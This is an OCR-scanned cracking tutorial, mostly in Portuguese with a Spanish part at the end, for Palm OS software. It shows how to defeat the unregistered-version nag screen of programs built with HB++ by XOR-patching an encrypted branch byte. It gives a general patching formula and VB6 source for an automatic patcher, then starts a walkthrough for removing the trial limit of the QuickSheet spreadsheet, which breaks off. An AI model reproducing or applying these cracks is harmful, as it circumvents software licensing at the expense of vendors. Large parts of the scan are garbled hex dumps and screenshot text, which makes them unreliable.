ó 00 00 00 00 00 O so 00 00 00 00 00 00 ATA dz OPRI.B E; DO 
00 00 00 00 o 00 oo 00 00 00 00 00 00 00 AAN 5 0000 'JTI.B $70, DO 
oo 00 00 00 00 ó o 00 00 00 00 0 DO0.00 OO socsióesimmesaa da 0003 41 OO0O00 OPRI.B f20, DO 
Do 00 00 00 0-00 00 00 00 00 00 00 00 00 00 ............... 000 ¿ co DOD0 J.B Hi DO 
o 00 00 00 00 00 ó o 00 00 00 00 00 00 00 0003 Zo. DODO OPI.E $30, DO 
oo 00 00 00 00 00 o 00 00 00 00 00 0 oo 00 ooo A e a [a a 1 ¿JI.B É50 DO 
oo oo 00 00 00 00 00 00 00 00 00 00 00 00 00 E 000 SA .... 0000 OPI.E $s DO 
DO 
ODO... 2JI.B £70, DO 
ooo ORI.B $20, DO 
DO 
DO 
DO 
po 
DO 


Ao | at ¡[DAA As | Ls 
po [| _b1 [ 2 | D3 | 6 e [00000000-00000000]: 


OD16ECC4 323C7PICE MOTE . 11 F30671!$77CF, Dl 


FIG. 10 


Agora teclamos F8. Veja o código sendo descriptografado nas janelas do southDebugger. Pode-se ativar um breakpoint na linha BLE... e teclar F5 para agilizar o 
processo. 


É muito importante rolar a janela do código sendo descriptografado para saber quando aparece o 4E4FA344 conforme a FIG. 11 


* southDebugger v1.7 - UNREGISTERED 
File Execution Window Tools Plugins Help tela e acompanhar a 


¡Bi (Bs (e(=] De Ez 05 OS do 
| disassembler l breakpoints - disassembler memory dump | 


main | 


EJE 


Clique para rolar a 


g 


O memory dump [42] al al [E] 


Information. For 


€ 


ED 6D € 


75 non commercial u EME $111!$6F 
MOVED f109!56D, Dl 
f116!157%4 ¿000 
$111!76F ¿000 
1/$466F ¿ODOSES99 
MOVE $3 ¿0, Dl 
EGT $111!/$6F ¿000 
EGT E 
ELS $111!$6F ¿000 
ELT £l109!f¿6Db ¡¿ODOSAZ 
ELCS fl114!1572 ¿000 
BELS f£l105!¿692 ¿000 
ES. 
65 MOVEA 


EL. MOVEA 


NN M6 dd 
a a 


rm 
mc 


na O A 


15] 


only. Povered 
00 by HE++ Eva 


) 48 42 2 


¿5E 00 o 00 00 00 


, a 
A 


o 
A 


E 


26 
0 


6É 00 00 00 00 00 a) 


¿RE DO oo 00 00 00 O 00 


LZSBE OO oo 00 00 00 oo 
¿SE 00 00 00 00 00 oo 


o 3 


oo 00 00 00 00 


q mí 


oo 00 00 00 00 


OSAZ2DE 00 oo 00 00 00 oo 


LZEE 00 oo 00 00 00 oo 


1 


oo 00 00 00 O ao 


Sk 
co 00 00 00 00 00 00 L 


JJ MN AAA AAN 
sm - 


AD € 


65 ADDO.W 
MOVED $£101!76 
ECC $ 
EHI $l21!1579 
MOVEA.L A0, A0 


CLR.B $11040!72B20(243) 


-J ín 


rod 


J3 Na 


p1 


Ss, 


A3 AS 
[az | Pc Da : DA 


[Dz |  U.. [00000000-00000000]: 


GITA ErRrerma 1091 MsñMA HICE > PTE MT AN T=zecnmoOtle*r17 To 


D4 


LARA 
HSO(AD, 


09!$D1], 


FIG. 11 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


Bj lea ce ¡515 O Y 
| disassembler | breakpoints - disassembler | memory dump | 


main | 


| memory dump [42] 


as E E hex cornmmariod 
Information. For Doo 94d 3. 3F3C0101 MOVE. H257? 13101, -1247) 
non commercial 1 00 TO... 4Es 300 TRAP Hl5!7F, 
ORI. $30, DO 
ORI. $30, DO 
ersion.http: 00 O NE ORI. £30, DO 
¿fura handheld-b DO as ORT. $30, DO 
c.com. NY. .H. DO AAA ORT. $70, DO 
ORI. $30, DO 
Dó0 00 00 00 DO 00 DO A ORT. DO 
o 00 00 00 00 00 IP ORI. DO 
DO 
DO 
DO 
DO 
DO 
DO 
DO 
DO 
DO 
DO 
DO 
DO 
DO 
DO 


J3 hh 5 7 
O A A > E 
O ím 
Rh dd 
1D 


(MM tn 


Mn 
e 
ín 
ín Md 
mín 0 


He 
5] 


Eo0 00 00 00 00 00 


LE Oo 00 00 00 00 00 
EDO 00 00 00 00 00 00 00 00 00 00 00 00 DO ba ORI. 
oo 00 00 00 00 00 00 00 00 00 00 00 00 00 DO Oran il ORI. 
oo oo 00 00 00 00 00 00 00 00 00 00 00 00 00 DO re DPI. 
oo oo 00 00 00 00 00 00 00 00 00 00 00 00 00 DO os ORI. 
oo 00 só 00 00 00 00 00 00 00 00 00 00 00 00 00 Aaa OBI. 
oo 00 00 00 00 00 00 500 00 00 00 00 00 00 00 DO MO DRI. 
ORI. 
ORI. 
ORI. 
ORI. 
ORI. 
ORI. 
ORI. 
ORI. 


o o o o o A o] 


Laa] 


o A ] 


A3 ¿ A5 
D3 : D5 


[00000000-00000000]: 


DOO16ECEE 6FE6 BLE B-26!15-14 ¡DO16ECDÉ6 [condition: TRUE] 


FIG. 12 


Encontramos! O patch consiste em alterar o BNE para BRA. Por que náo BEQ? Porque se alterarmos para BEQ a nag screen vai deixar de aparecer no Palm mas 
vai aparecer no POSE. Se alterarmos para BRA a nag screen náo aparece em nenhum dos dois sistemas!!!! 


Vamos agora executar passo a passo pra ver quando o BNE aparece. O opcode é 660001BE. Quando ele aparecer, anotamos o valor de A0+D2, pois 
A0+D2 aponta para o código criptografado que está no .PRC original!!! 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 
E 
¡Bl (e | CE 215 OY 
| disassembler | breakpoints | disassembler Il memory dump register 


main | 


¡8 memory dump [42] ES! O disassembler ES | 


000342 15) | de «% | L y» | $ dec'hex v [00034204 | leo) | 58 «% | L | > | $9 
ess| 0) 1/2/3/4]5]6]7)] 8] 9/10/11/12/13/14)15] ascil If address | ascii |  hex | command | notes] 
6E 66 6F 72 6D 6l 74 69 6F 6E 00 46 6F 72 20 Information.For 3F3C0101 MOVE.W  g257!$101, -(27) 
6F 6E 20 63 6F 6D €D 65 72 63 62 6l €€C 20 75 non commercial u 4E4FA344 TRAP H1S5!FF, f41796132344 [sy... 
65 20 6F SE €l 73 00 50 EF 77 65 72 65 64 20 se only. Povered ADDQ.W.O f72, A? 
79 20 48 42 2E 2E 20 45 76 6l €l 75 6l 74 69 by HE++ Evaluati TST.L DO 
DOOSA25E 6F 6E 20 56 65 72 69 6F 6E 00 63 74 74 70 34 on Version.http: EME É30 
D0O3A26E 2F 2F 77 77 2E 628 6l 6E 64 68 65 £l 64 2D €2 “¿mm handheld-b ORI.E f30, DO 
0003427E 61 73 69 63 623 6F 6D 00 00 4E 56 FF CC 48 E? asic.com. .NV..H. Mo Buin ORI.E $30, DO 
DOO3A28E 1C ¿0 5E 00 08 SF 35€ 01 01 4E 4F 23 44 54 4FE . ¿n..?=<. .NO.DTO OFI.E $50, DO 
DOO3A29E 44 20 0 00 00 00 00 00 00 00 00 00 00 00 00 JJ. f..........--- IMODOSAZBO .... OPI.BE $30, DO 
00034224 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 -..............- OPRI.E $30, DO 
d qn Quo 00 ad [01M] 00 aa OPRI.B $30 é po 
OPRI.B $30, DO 
OPRI.E $£30, DO 
OPRI.E $30, DO 
: (0454AE71 : : [000 A, 
OPI.E $£30, DO 
: [0OD05E44 URE-E. Ae0L ED 
OPRI.B $30, DO 
: [00004DC2 : : [0003421E : [00004098 e E il 
OPI.B $30, DO 
: [D0D0O5E44 : [D003BB1C : (00038810 ORI.E $30, DO 
ORI.B $30, DO 
USP: | | PC: [0O16ECE4 | SR: [A0D0 | OPI.E $50, DO 
DOOSAZECc .... ORI.B £30, DO 
[extended] 
[carry] [overtiowe] [zero] [negativo] AO [ A1 [ A2 | A3 [ 44 | A5 [| A6_ | AZ | PC | 


PRA 7 y” n Poe Ñ Poe n ma n ns n y n mo n .n 1 


AMM A | AD | A | A2 | A3 | AA | AS | A6 Y 
D 


A0 at |HUR2, as AS A5 A6 A7 PC DO D1 02 [ 03 f[ DÍs | 5 | 


[00000000-00000000]: 


OD16ECE4 5241 ADDO.M  f$1, DÍ 

FIG. 13 
Veja a FIG. 13. Apareceu o 66.... Agora abrimos a janela que mostra os registradores. 
AO = 4DC2 
D2 = 82 
AO + D2 = 4E44 


Voltamos agora a janela de DUMP e clicamos em AO. Procuramos os bytes em 4E44 conforme a FIG. 14. 


* southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 


8] 2/48] CB 21, O 9 
| disassembler l breakpoints | disassembler - memorydump register 


main | 


| memory dump [40] pé al E) disassembler p* al [ES] 


00004D( dechex v | 00034294 | lo) | 8 « | % | > | $9 
Posición en RAM 5 | addr ascii hex cormmimard | notes 
2F ? 000 7 3F3C0101 MOVE. W $25?7I1g101, -(47) 
4842 - 443 5B 000 4E4F24344 TRAP $15!F¿F, $41 796/5344 [s y... 
22 da 43 12 FE €0 4 43 ...$8JL2.-"D-S5E.C Poco ¿DDO. 2, A 
C4 63 94 55 47 6r zc..06..18.1 (PY4000 TST. L DO 
66 18 9D 23D 000 EME $30 ¡¿ODOZAZAZ 
2 BA 11 31 64 8l F29 000 ORI.E $30, DO 
CD ¿ B6 297 FS FS 30 73 000 ORI.E $30, DO 
DS 1B 00 99 BS 53 0A 12 AS Doo OPRI.E $30, DO 
42 45 E? 7F E2 Dl 64 00034 ORI.E $30, DO 
45 5C 6l DE BS 75 67? 000 ORI.E £30, DO 
00004E62 CD sc ÉA 01 23 43 2A 19 08 0003 ORI.B $30, DO 
00004E72 82 B? 47 41 24 45 06 55 : 000342 ORI.E $50, DO 
DO0004ESZ 34 40 239 2A2 67 47 04 53 99 c4B)..!1g6 000 ORI.B $£30, DO 
D0004E92 3 a! 34 Ed 12 B3 E2 0l 78 | D4..F....x ooo ORI.B $30, DO 
DODO4EAZ2 7B 9 B4 92 [4 323 85 FC 7C EO 2C F8 (.%..... E E Doo OPI.E $30, DO 
DO004EB2 79 E3 74 03 08 A C1 E9 524 Al yw 2 h Z 000 ORI.E $30, DO 
GUI MODT P *<nm nf 


DOUODDOSlcb ¿> 


UL £73 vo4 AL YW....%2...D...ó. UL 


ORT. 
ORI. 
ORT. 
ORI. 
ORI. 
ORI. 
ORI. 
ORT. 


Do 
DO 
DO 
DO 
DO 
DO 
DO 
DO 
DO 


A o 


AO [ar a2 A3 El A5 A6 Az Pc 
21 n2 A3 n4 As | A6 | A PC DO | D1 D2 D3 D4 D5 D6 D7 U... 


[00000000-00000000]: 


DO016ECE4 5241 ADDO. 1 51, Dl 


FIG. 14 


Para confirmar abrimos outra DUMP window e clicamos em A2, conforme a FIG. 15 


'" southDebugger v1.7 - UNREGISTERED 


File Execution Window Tools Plugins Help 
IB le/s| (08) (EA 


| disassembler l breakpoints l disassembler | memory dump l register Ñ memory dump [40] 


_—, R 


DQO 


m- 


main | 


g 


(5 memory dump [A0] O (E) memory dump [A2] o a E 


ascil 
Information. For 


14] 
Alu 


mm 
“y 
an 


DODO4dDC2 BO 
ODOO4DDZ BS 


E 12 
74 69 EF GE 00 46 € 


mn 
mn 
aan 
hs 


Belo 
as 
[>] 


6 6F 6 63 6. 20 795 non commercial u 
00004DE2 CE E! éc 732 00 65 6 se only.Povered 
q 2 6r 6 


00004DbFZ2 FD 
O000dEOZ EE 
DOD0O04ElZ 40 
00004 
D00004E3 
D00004E42 
O00O04ESZ EB 
DODO4E6Z 
D00004E72Z 
00004 
O000d4ES 
00004E2 
DODO4EB2 79 77 DC 246 FF E3 72 03 


--] 
in 


74 69 by HE++ Evaluati 


on Version.http: 


J 

Me 
g J 
A] 
J J 

o 


0 
' 


¿mm handheld-b 
3 E? asic.com..NV..H. 


4F . ¿n..?<. .NO.DTO 


e] 
hi 
a 
a 
Me 

Y 


01 01 4E 4 


oo 00 00 00 00 00 00 00 00 00 00 00 J.£ 


a] 
to 
ñ 
AS 
EN 
in 
ES 


€ 


SS 


00 oo 00 00 00 00 00 00 00 00 00 00 00 


; 
Po. 
od 
oO 
co 


ooo oo 00 00 00 00 00 00 00 00 00 00 00 


ooo vo oo 00 00 00 00 00 00 00 00 00 00 


ooo oo 00 00 00 00 00 00 00 00 00 00 00 


ooo oo 00 oo 00 00 00 00 00 00 00 00 00 00 00 


BA Cl ES 5A Al yw....2.. 20E 00 00 


oo oo 00 00 00 00 00 00 00 00 00 00 


oo 00 00 00 00 00 00 00 00 00 00 00 


DOOO4EB2 792 97 DC 26 FF ES 724 03 08 AS 62 Ea Cl E9 52 Al yw....2z... 


Opcode de BNE 


SLSOE 00 00 Op 00 00 00 00 00 00 00 00 00 00 00 00 00 -..............-. 


7 At A2 A3 ñ4 AS A6 A7 A0 1 a A3 | 4 | A5 A6 Az 


DO |  D1 D2 D3 DA D5 D6 D7 DO DIO [ D2 [ D3 [| D4 [| D5 _D6 D7 


DO16ECE4 5241 ADDO.W $1, D1 
FIG. 15 
Vimos que o 66 que significa BNE corresponde ao A8 no .PRC criptografado. Agora vem o cálculo: 
De A8 ele descriptografou para 66 
De ?? ele precisa descriptografar para 60 (60 é o opcode para BRA) 
Sabemos que a criptografia é um simples XOR e que é feito pelo byte de DO conforme FIG. 9. Sabemos também que DO = CE conforme FIG. 13. 
Lembrando: EOR.B DO, D4 - significa que pega o byte CE e faz um XOR com D4, 
A8 XOR CE = 66 
60 XOR CE = AE 


É válido dizer que: 


A8 XOR 66 = CE <----- Fórmula para calcular byte de outros programas!!! NI 


60 XORCE=A6 <----- Fórmula para calcular byte de outros programas!!!!!!1!!!! 


Entáo basta trocarmos o byte A8 para AE. Vamos ao UltraEdit e localizamos a seqúéncia 43 CA A8 16 A3 4C, conforme a FIG. 16 


€” UltraEdit-32 - [E:MArquivos de ProgramasiStanleyWPalmWCrack1PRCsWMolecule. pre] 


19 File Edit Search Project view Format Column Macro Advanced Window Help 


[es DG ode Aa WM | n|[=/|1¿B48 


Molecule.pre | 
] 


poooffaoh: 00 00 75 65 SO :; 
OODoOfíbO0h: FF BO 5: 17 96 DS; 
DODOfIcOh: 3F BS 33 BS 79 29 ; 
OODoOfídoh: B4 CE 43 Se DF E 
00 7 39 B2::; 


1i120 


o 
5] 
in 


ooo0offe0h: 43 
OOfIIOh: 6l 


o0010000h: SD 0s 29 Bad 11 31 64 51 F9 EC :; OLÉGBG:< +." 100% 
onoioo1O0h: 2B 24 AD F7? B6 97 FS FS 30 73 BE: +fuctól--9-ÓbOs» 
onoi0o020h: OC 36 12 0 DS 18 00 29 ES 53 02 12 45 01 ; ¿¿H.A0.. 9, 3..Y 


DOD10030h: C2 Á 


a 
o 
> 
00 
Hu 
hn 
to 
L) 
NS 
a 
e] 
NS 
y dm 
AD 
b 
un 
(5 
-] 
-] 
+ 
E 
$ 
JO 
— 
mn 
NS 
e. 


on0010040h: 45 6D 54 458 D7Y El S5S£ 61 DE ES 75 67 ; 
oo0i00soh: 26 al 99 612 65 24 01 23 43 24 19 085 ; 
00010060h: Ds 55 Fa O? E? AC 47 41 24 45 06 


EE 22 DF 63 34 40 
D3 87 7C OC 89 4F 
7B 9E 25 DE EE B4 
¿6 FF E3 
14 C6 
EF 2B 
80 E2 49 
100e0k: 43 FS 
EAS 5 AF O05 B6 18 7 Findascil 
10100h: 61 B1 79 AC 0€C F7? 6. 10 AO C£ 0 
00010110h: 92 F3 4E 5A 14 24 CC C1 F2 EZ TT Match Case 

00010120h: D? 20 37 47 45 C4 FA 1F 3E 04 [Regular Expressions [£SCIl Orly] 


10070h: DE 
100s50h: 55 > 
1i0090h: 01 78 
10D0aD0h: 20€ 
1005ÉO0h: 54 41 FF 12 
100cOh: 16 9B BO 95€ 52 
100d0kh: 


AS 


yO 
E 


" 
, 
7 


Find What: 43 CA 481643 4c 


Hex strings should hawe bwo characters per byte and 
each byte may be separated frorn another with a 
space 


Example: FFFE FD orFFFEFD 


h 
lo 
a 


JJ. 
co 
A A 


-J -] 
A 


"Pos 
lo 


do 
to: 


Direction 


(> Up (e Down 


OOOO OOOOOoOOoOOoOOoOoOoOo0N-—+. 


DA ns CAM mi mn rr re mn ma nr 


FIG. 16 
Substituímos A8 por AE. Salvamos e sincronizamos com POSE e PALM. Pronto! Em nenhum deles aparece mais a nag screen. 
Atencáo!!! 


Em outros programas náo é possível encontrar a sequéncia 43 CA A8 16 A3 4C pois ela é dinámica, ou seja, cada criptografia usa uma chave randómica para 


Para patchear outros programas feitos no HB++ náo registrado, basta localizar a posigcáo absoluta do byte desse exemplo e alterar. Veja a FIG. 17: 


€? UltraEdit-32 - [E:Arquivos de ProgramasiStanleyWPalmWCrack1PRCsWMolecule. prc] 


ile Edit 


Search Project view Format Column Macro Adwanced Window Help 


sonas vin E 


290550 NN == Bit |? 


DO 
go 
o0 
DO 
DO 
oo 
o0 
DO 


) 


ae 


í 


O:'0 


Oo 


ro 
OO0OOOOO O. 2.0 0000009000 


0DOO0OODOOOOOOOOOOOO ONO OODO0OOOOoOo.OOoOOoOOSOOoOOOoOoOOoOOoO Oo 


¡a a] 
e O Y 


de 


H 
A 
lO Q 
O 
p 


H 
H 
ía 
o 
pu 
p 


oooO: 
0010h: 
00z20h: 
DO30h: 
0040: 
DOSoh: 


0060: 


DO?OA: 


DOS0h: 


O0aDh: 
DOOR: 
DO0coh: 
DO0doh : 
Odeoh: 
DOOR: 
0100: 
0110h: 
D120h: 
0130h: 
0140h: 


O 80 FE.61 ; 


7 75 76 77 78 79 74 7B 70 7D 7E 7F 

8 84 85 86 87 88 89 9A 8B 9C 8D SE SF 90 91 ; 
92 94 95 96 97 98 99 94 9B 90 9D SE FF 40 Al; 
22 14 AS A6 A7 AS A9 AL AB AC AD AE AF BO Bl; 
B2 B4 ES B6 E7 BS E9 BA BB EC ED BE BF E0O El ; 
E2 E4 ES E6 E7 ES E9 Ed EB EC ED EE EF FO Fi; 
F2 F4 FS F6 D7 FS F9 FA FB FC FD FE DF E0 El ; 
E2 E4 ES E6 E7 ES E9 Ed EB EC ED EE EF FO Fl; 
F2 F4 FS F6 F7 FS FS FA FB FC FD FE FF 5D 02; 
00 00 00 52 589 : NA E So +; 


FF BO_ 54 DS 69 EO SF 17 BA 03 44 01 D7 C5 90 DS 
3F B5 33 4E 88 17 6B BS 1D 29 9F B2 10 04 79 29; 
B4 CE 18 42 25 38 44 43 12 7E 60 44 7E 35 52 0F ; 
74 63 B7 94 55 47 F4 Di sc 


43 FD D9 C49 19 7” : 
6. EE A€ Das 7F 18 5D 3F 2D 3D F7 37 7 ; 
q¿- __  _ _ —_ _ ___-_ 
9D 42 CE DF 47 5B 22 05 99 Bi 11 31 64 51 F9 EC :; 


¿Bb 24 75 63 B1 FO CD 2D F7? E6 97 FS FS 530 73 BB : 
OC 3B 058 45 12 €0 DS 15 00 929 BS 53 02 12 245 Dl : 
C2 FF 43 CA (18) ASAAETCEA BO ASE AE ESOO 
do 13 EE 6b A DI? ECOS 61 DE ES 75 n 


26 43 


ac 
Fa 
EE 
D3 


tu 
lo 
OS 


(a 
A 


Hb o 
2 AD 
to 
r 
a 
a 
pp 
mps 
A 1] 


Hu 
+] 
La 
Hu 

A e! 

Ñ 0 
jo 
mx] 
A 
q 
p 


DO + 


ac 


o1 TB SE 314 69 55 FC 7 
2. an 74 03 05 45 62 Bd Cl 
54 14 a Co€ 97 

3 


HB ( 
Li te 

Hu 
ma] 


La 
Lo 
p. 

A SS 


E 
o o o 
00 Qu 0 
co 
| 
O tn 6 
(a 
AS 
PR 
J ty ri 
NS 0-33 050r 5 
+ 
in 


-] 
E [ 
a 


“D 


20 


DD PR 
m0 
dot 
Lo 
Ly te 
204 
2 Hd 
152) 
» dos 
, 


do. 
, 
Ya) 
ma] 


E 
JJ b 
nm -] 
ty 
Lar] 
+ 
xj 
QQ pp 
NÓ 


co 
Mm -] 
5) 


ns] 
A a) 
0 E 


oc F 


Tm 

A 

y. 

Pee 

E 

a 
Do -)J 
» 
5 
uu] 
S 


+ 
55] 
lo 
Pp 
> 
1) 
[52] 
jo 
p 
R 
ma] 
rx] 
] 
Ju 
r 
a 
E 
[ur] 
p 
s 


AN 
od 
in 

tl 


le -] 
10y] 
108] 
e] 
p. 
rx] 
158) 
e 
e) 
2 dm - 
mao 
DO 
--] 
+ 
Lu] 


o 
, 
rx] 
rx 
p 
T 
ñ 
[52] 
o E 
--] 
n 
, 
mx] 
[ur] 
e E 
to 


bm ( 
do 
-J 
a 
ma] 
ao 
a 
pp 
co 
ma] 
TT 
tn 
ma] 
SN 
» 
, 
+ 
m 
nm 
Hu 
m3 
A 
lo p 
Bd 
q pp 
109] 
Ti 
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Pos: 10034H, 65588, CO DOS Mod: S/a8/200 


oó0bo=súuddiypbáad 


éciiiióñ 


cc H.L0.. PM, 5..F. 
iycÉB]. £Li*EqCoáÑa 
"mA a Pu 
cilEó "jer, gor... 


2, ÓGADE.U 


áaty."= 1. 


"óNZ.+*Iicár—Ms4 


23:51:11 File Size: 7 


TrS 


Notamos que em TODOS os programas compilados com o HB++ versáo 1.05.973.1309 náo registrado, temos os bytes constantes True.False conforme 
assinalado na FIG. 17. 


O byte A8 que pretendemos alterar para AE está numa posicáo fixa de 134 bytes após a seqúéncia 54 72 75 65 00 46 61 6C 73 65 (True.False em ASCII). 


Para patchear outros programas compilados com o HB++ versáo 1.05.973.1309 náo registrado, basta procurar a sequéncia 54 72 75 65 00 46 61 6C 73 65 
(True.False em ASCII). 


Ao encontrá-la, altere o 134” byte. Pegue o valor do byte e faca um XOR com 66 (que significa BNE). Com isso vocé encontrará o valor que deve estar em DO para 
descriptografar. Basta entáo fazer um XOR desse valor com 60 (que significa BRA) assim: 


€ UltraEdit-32 - [E:lArquivos de ProgramasiStanley1HB++WyProjectWyProject.prc] 


d File Edit Search Project view Format Column Macro Advanced Window Help 
€ Dro ela % 02 


MyProject pre | 


230550 


Ed 


00005570h: 00 5 00 46 61 60 73 ; ]....FeTrue.Fals 
0000S5S5S0h: SA 43 04 23 59 4F ; ePyY LAacH.HYO 
00005590: Fo 26 BS 8C 52 414 ; 

D0005saDh: 3D 35 46 E6 78 3F ; 

DODOSSkOh: 3 C2 FD 52 93 14 

DODOSSscOh: C6 83 DS 589 ES : A- 
DODOSSaoh: AS 2B 1F A6 DF O; .-C:108U8%.Y+.!b 
00005s5e0h: ED B1 57 F3 24 ; £R9%ó¡3.2!1i+0ó* 
DODOSSTOh: DE 12 F5 C8 54 aiVáiuxról...óET 
D0000sSé00h: 59 737? DE 49 5D Él I-P43130% Ow.1] 1 
00005610: LA CE 53 4B C0 77: [Sz=B5'e?d.ÍskKiw 
00005620: 3 7DC 44 05 41 20; :.86d..F31-DJ.;, 
00005630h: OD 50 41 8D 74 AD FO 9B 42 867 ; .p.i<".P¡Dz 6>B+ 
000056 O EO0 (01 59 BA 52 D? 19 9D C3 F9 ; B¿HOFSAAYSR»=.DÁn 

FIG. 18 outro programa!!!!!! 


O 134” byte após 54 72 75 65 00 46 61 6C 73 65 (True.False em ASCII) é 6A (FIG. 18). Sabemos que 6A será 66 quando descriptografado. Sabemos que é um 
XOR entáo: 


6A XOR 66 = 0C 

Precisamos de 60 em vez de 66 e agora sabemos que o byte de criptografia é OC entáo 
60 XOR 0C =6C 

Portanto devemos substituir 6A por 6C. 


Conclusáo: Para patchear programas compilados no HB++ versáo 1.05.973.1309 náo registrado, use o ultraEdit e procure os bytes 54 72 75 65 00 46 61 6C 73 
65, o 134” byte após essa segúéncia deve ser alterado segundo a fórmula: 


Byte_atual XOR 66 = byte_chave_criptografia 


Byte_chave_criptografia XOR 60 = novo_byte 


Altere Byte_atual para Novo_byte e pronto! Seu programa náo vai mais apresentar a nag screen!!! 
Afer Ventus 


Brasil 


Post nubilaWWyahoo.com.br 


Código em VB6 para patcher de PRCs criados com HB++ 


va) PatcherHBPros 
3) MyProject 

a] PatcherHBPrcs 
[9] mPatch 

laa] hssc 

Como patchear programas feltos no HB 
=] ERRATÓ HB++ 

laa] IrmPatch 

5 fimPatch 

3 PatcherHBPros 

la] PatcherHBPros 

E 
$ 


No formulário criar: 


MyProject [Compilado con trial 


3 commandButtons 
1 commonDialog 
3 Labels (um dos labels deve ter caption = 'Arquivo: *) 


Public wFile As String 
Private Sub Command1_Click() 
CommonDialogl.FileName = "" 


CommonDialogl.Action = 1 
wFile = CommonDialogl.FileName 
If Trim(wFile) <> "" Then 


Command3.Enabled = True 

Label2.Caption = wFile 
Else 

Command3.Enabled = False 


End If 


End Sub 


Private Sub Command2_Click() 
End 


End Sub 


Private Sub Command3_Click() 

Dim wByte As Byte 
Dim wString As String 
wSearchString = "True" + Chr(0) + "False" 
Label3.Caption = "Procurando por 54 72 75 65 00 46 61 6€ 73 65" + Chr(13) + Chr (10) 
Open wFile For Binary Access Read As +1 
For i = 1 To LOF (1) 

If EOF (1) Then Exit For 

DoEvents 

Get +1, , wByte 

wString = wString + Chr (wByte) 


Next 

Close +1 

wPos = InStr(1, wString, wSearchString) 

Label3.Caption = Label3.Caption + "Encontrado em: " € wPos £ " — " + Hex(wPos) + "H" + Chr(13) + Chr (10) 

wPos = wPos + 143 

wByte = Asc(Mid (wString, wPos, 1)) 

Label3.Caption = Label3.Caption + "Byte a alterar: " € Hex(wByte) + "H" + Chr(13) + Chr (10) 

wChave = wByte Xor 102 

Label3.Caption = Label3.Caption + "Chave = "+ Hex(wByte) + "H XOR 66H = " + Hex(wChave) + "H" + Chr(13) + Chr (10) 
wByte = wChave Xor 96 

Label3.Caption = Label3.Caption + "Novo byte = 60H XOR " + Hex (wChave) + "H = " + Hex(wByte) + "H" + Chr(13) + Chr (10) 
Mid (wString, wPos, 1) = Chr (wByte) 

wFile0ut = Left (wFile, Len(wFile) -— 4) + ".Patched." + Right (wFile, 3) 

Label3.Caption = Label3.Caption + "Gravando arquivo " + wFile0ut + Chr(13) + Chr (10) 


Open wFile0ut For Output As +1 
Print +1, wString 
Close +1 
Label3.Caption = Label3.Caption + "Arquivo gravado." 
End Sub 


Así es como se ve el archivo ya compilado y vemos como al parchar un PRC nos muestra los cambios echos. 


"> Patcher para PRCs do HB++ [olx] 


E »bmy D ornlo ads*Como_patchear_PREs_cnados_com_HB__*MypProject [Compilado con Abrir | 


Procurando por 54 72 75 65 00 46 61 6. 73 65 


Anquivo: 


Salir 


NOTA ERRATA HB++: 


Na página 15 do arquivo "Como patchear programas criados com HB++ náo registrado" há um erro de digitacáo. 
ERRO 


==== texto==== 


A8 XOR CE = 66 
60 XOR CE = AE 


É válido dizer que: 


A8 XOR 66 = CE 
60 XOR CE = A6 <==== ERRO ERRO ERRO 


==== fim texto=== 


CORRECÁO 


==== texto==== 


A8 XOR CE = 66 
60 XOR CE = AE 


É válido dizer que: 


A8 XOR 66 = CE 
60 XOR CE = AE <==== CORRETO CORRETO CORRETO 


==== fim texto=== 


Favor alterar, 
Obrigado, 


Afer Ventus 


Brasil 


Palm Spanish Tutor: Página dedicada a la divulgación de información en Castellano, 


Inversa y Programación en Palm. E-mail 


"Colabora con tus Proyectos" 


sobre Ingeniería 


Palm Spanish Tutor 


()Serial ()HotSync/Code ()Trial ()Multiprotección ()Encriptado (X)Otro 
Hoja de cálculo al estilo Excel pero para palm 


Objetivo: | Quitar las limitaciones de una demo version y hacerla full version. 
Dificultad: |(x)NewBies ()Intermedio ()Avanzado ()Master ( )Gúru 


DOWNLOAD: | http://www.cesinc.com 


SouthDebugger, PRCedit, PilotDis. Palm Real ó Pose emulador, UltraEdit-32, PalmDemon 0.27 PalmDebugger 
INTRODUCCION 
About Quicksheet 


Quicksheet 
6 vu. 7.157 


To purchase: 


214-956-9808 31 (outside US) 


E da y 


Softugre Imc. 
All Rights Reserved 


FIG. 1 


15 dias depois de instalado o QuickSheet exibe uma mensagem conforme a FIG. 1: 


AL ATAQUE 


Thank you for trying 
Quicksheet. Your 15 day 
trial has expired. Please 
purchase Quicksheet 
frorn 


WWW. cesinCc Com 
300-991-7360x1 (U5) 
972-473-8710x1 (nt) 


FIG. 2 


QuickSheet - Palm Application Explorer 


File Edit view Help 


> e q LJ 
= QuickSheet.PRE re A 
+ MBAR (6) Resource size: 15 bytes File offset: OX66630 [419376] 
+ MENU (6) 
+ Smmrt (1) x E 
> Talt (18) Esse sinal é o mesmo que aparece na 
Eo FIG. 2 e é a única Talt que possui esse 


1020 (Ox03Fc) 


sinal . Concluimos que essa Talt é a 


que aparece na FIG. 2. 


6704 (0x1a30) 


FIG. 3 


Al Ataque 


O primeiro passo consiste em encontrar o formulário dessa mensagem usando o prcExplorer conforme a FIG. 3. Descobrimos que se trata de uma Talt conforme 
assinalado na figura. 


Agora rodamos o southDebugger e adicionamos um breakpoint na sysTrapFrmCustomAlert para detectar quando essa Talt é chamada, conforme FIG. 4. 


=" southDebugger v1.7 - UNREGISTERED O6)x) 


File Execution Window Tools Plugins Help 
Br (ee ca ¡515 OY 


[main | 


(7 disassembler [PC] MES: 


dechex 


command 


EPA $1024!17400 ¿PrvHandleEvent+00000D94=10019C90 
TST.E D3 
BE $74 ¡PrvHandleEvent+00000944=100193914 
4E4FAOBE TRAP H15!/$F, f£41150!7$2A0BEÉ [sysTrapSysLaunchlonsole] 
o s 5 2001 LEO e 
10019890 e E00003F2 ¡8 breakpoints E ; plÉ a [=] 
1001: J. 4203 


ao A E breaoints | tray reakpomas ¿condi Arapbreakpoints 


10019314 1F3CO0OlE 


1001: 53 o 3F 10 
1001982 ¿MIDI 2F3C4D494445 HOT SET 


1001: ca NO.n 4E4FA36E NOT SET 
1001: a PO 504F 
2001 


MOVE.E 

TRAP 
1001: p O ¿2DDOQ. 
1001: , «1 p MOVE 
1001980 A ERA 
1001928D2 TJ. 4403 TST.E 


pas e 


[sysTrapSndPlaySystenSomund] 


E 


+4 
one o 


ES 


A0 : A6 
DO : D6 


[10018EF6-10019C98]: PruHandleEvent 


a] 


PruvHandleEvent 
10019882 7001 


MOVE O 


